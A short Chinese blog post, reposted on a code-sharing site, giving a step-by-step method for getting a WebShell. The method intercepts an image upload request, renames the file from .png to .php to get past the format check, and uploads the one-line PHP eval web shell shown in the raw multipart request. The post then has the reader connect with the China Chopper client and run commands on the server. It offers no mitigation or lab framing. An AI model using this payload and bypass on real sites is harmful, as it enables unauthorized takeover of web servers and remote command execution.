码迷,mamicode.com
首页 > Web开发 > 详细

绕过图片格式限制上传木马获取WebShell

时间:2016-07-11 10:20:00      阅读:624      评论:0      收藏:0      [点我收藏+]

标签:

思路:

  图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php

可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,

记录下来后用菜刀连接即可。 

(1)网站要求上传png格式的文件

技术分享

(2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。

Content-Disposition: form-data; name="fun_menu_icon"

test123trojan.php
-----------------------------1962884403821
Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"
Content-Type: image/png

<?php @eval($_POST[caidao]); ?>
-----------------------------1962884403821
Content-Disposition: form-data; name="fun_menu_img"

test123trojan.php
-----------------------------1962884403821
Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"
Content-Type: image/png

<?php @eval($_POST[caidao]); ?>

(3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录。

技术分享

(4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao

技术分享

技术分享

(5)连接虚拟终端,输入ipconfig

   技术分享

木马成功上传并执行。

绕过图片格式限制上传木马获取WebShell

标签:

原文地址:http://www.cnblogs.com/tdcqma/p/5659270.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!